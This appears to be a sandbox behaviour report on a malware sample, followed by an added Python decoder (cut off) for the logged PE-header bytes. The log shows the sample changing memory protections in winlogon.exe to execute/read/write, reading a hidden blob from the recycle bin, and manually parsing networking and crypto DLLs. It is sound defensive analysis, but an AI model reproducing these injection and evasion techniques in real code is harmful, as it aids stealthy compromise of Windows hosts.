Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019921869
System info queried Type: BasicInformation success or wait 2019922148
System info queried Type: ProcessorInformation success or wait 2019922253
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019922827
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAF65C8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019922932
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2019923540
System info queried Type: BasicInformation success or wait 2019923659
System info queried Type: ProcessorInformation success or wait 2019923760
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019923904
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019924205
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019924295
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019924430
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019924519
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019924624
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019924832
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019924920
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019925102
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019925218
System info queried Type: BasicInformation success or wait 2019926057
System info queried Type: ProcessorInformation success or wait 2019926300
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019926912
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAFF660 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019927019
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2019927376
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2019928143
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D94D508 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2019932510
System info queried Type: BasicInformation success or wait 2019932615
System info queried Type: ProcessorInformation success or wait 2019932717
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019932861
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019933170
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019933261
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019933396
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019933487
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019933597
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019933808
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019933899
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019934085
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019934205
System info queried Type: BasicInformation success or wait 2019934490
System info queried Type: ProcessorInformation success or wait 2019934595
System info queried Type: BasicInformation success or wait 2019935515
System info queried Type: ProcessorInformation success or wait 2019935617
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019935764
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019936068
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019936162
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019936300
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019936393
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019936502
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019936713
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019936805
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019936991
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019937109
System info queried Type: BasicInformation success or wait 2019937391
System info queried Type: ProcessorInformation success or wait 2019937495
System info queried Type: BasicInformation success or wait 2019938414
System info queried Type: ProcessorInformation success or wait 2019938515
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019938662
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019938965
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019939058
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019939196
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019939288
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019939396
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019939608
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019939699
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019939884
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019940003
System info queried Type: BasicInformation success or wait 2019941063
System info queried Type: ProcessorInformation success or wait 2019941168
System info queried Type: BasicInformation success or wait 2019942156
System info queried Type: ProcessorInformation success or wait 2019942270
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019942417
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019942723
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019942817
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019942956
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019943048
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019943169
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019943461
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019943563
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019943750
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019943869
System info queried Type: BasicInformation success or wait 2019945258
System info queried Type: ProcessorInformation success or wait 2019945371
System info queried Type: BasicInformation success or wait 2019946310
System info queried Type: ProcessorInformation success or wait 2019946413
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019946562
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019946867
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019946961
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019947101
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019947193
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019947303
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019947515
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019947608
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019947794
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019947914
System info queried Type: BasicInformation success or wait 2019948200
System info queried Type: ProcessorInformation success or wait 2019948304
System info queried Type: BasicInformation success or wait 2019949229
System info queried Type: ProcessorInformation success or wait 2019949331
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019949479
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019949785
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019949878
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019950018
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019950110
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019950218
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019950431
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019950558
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019950747
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019950867
System info queried Type: BasicInformation success or wait 2019951150
System info queried Type: ProcessorInformation success or wait 2019951255
System info queried Type: BasicInformation success or wait 2019952206
System info queried Type: ProcessorInformation success or wait 2019952308
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019952455
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019952762
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019952856
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019952995
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019953087
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019953196
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019953409
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019953501
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019953688
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019953808
System info queried Type: BasicInformation success or wait 2019954091
System info queried Type: ProcessorInformation success or wait 2019954197
System info queried Type: BasicInformation success or wait 2019955139
System info queried Type: ProcessorInformation success or wait 2019955241
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019955386
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2019955694
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2019955788
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2019956530
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 20 Value: 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019956624
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 2019956735
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2019956948
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 2019957040
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2019957226
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2019957347
System info queried Type: BasicInformation success or wait 2019958378
System info queried Type: ProcessorInformation success or wait 2019958489
System info queried Type: BasicInformation success or wait 2019959786
System info queried Type: ProcessorInformation success or wait 2019959889
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019960034
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2019960347
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2019960441
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2019961246
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 20 Value: 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019961337
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 2019961448
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2019961660
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 2019961753
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2019961940
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2019962060
System info queried Type: BasicInformation success or wait 2019963052
System info queried Type: ProcessorInformation success or wait 2019963164
System info queried Type: BasicInformation success or wait 2019964686
System info queried Type: ProcessorInformation success or wait 2019964792
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019964937
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2019965251
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2019965345
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2019966103
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 20 Value: 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019966197
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 2019966307
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2019966520
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 2019966613
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2019966798
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2019966917
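The repeated open / seek-to-offset-60 / read 4 / read 20 / read 224 / read 160 / read-only "Section loaded" sequences above (eight times for wininet.dll, then once each for ws2_32.dll, advapi32.dll and crypt32.dll) are a manual walk of each DLL's on-disk PE header: e_lfanew at file offset 60, then IMAGE_FILE_HEADER, IMAGE_OPTIONAL_HEADER and the section table, followed by a private read-only mapping of the first part of the file. The decoder below is an added example and is not part of the Joebox report or the sample's own code; it parses the exact bytes from the wininet.dll "Value:" fields (the report truncates a logged value to 100 bytes, so the optional header and section table are partial) and shows two things a reader cannot see from the raw hex: the export directory RVA 0x18F8 lands at file offset 0xCF8, inside the 65536-byte mapping, and the preferred ImageBase 0x3D930000 puts the "Memory attributes changed" address 0x3D94D508 at RVA 0x1D508 in wininet's .text, on the assumption that the DLL is loaded at its preferred base inside winlogon.exe. Function names and the constants MAPPED_BYTES and PROTECT_CHANGE_ADDR are the example's own.

```python
"""Decode the wininet.dll header bytes the report logged: the 4-byte read after
the seek to offset 60 (e_lfanew), the 20-byte IMAGE_FILE_HEADER, the 224-byte
IMAGE_OPTIONAL_HEADER and the 160-byte section table.  Hex strings are copied
from the report's "Value:" fields; the report caps a logged value at 100 bytes,
so the last two are partial and only complete structures are parsed."""
import struct
from datetime import datetime, timezone

E_LFANEW_HEX = "F8 00 00 00"
FILE_HEADER_HEX = "4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21"
OPTIONAL_HEADER_HEX = (
    "0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 "
    "00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 "
    "05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 "
    "00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 "
    "F8 18 00 00")
SECTION_TABLE_HEX = (
    "2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 "
    "50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 "
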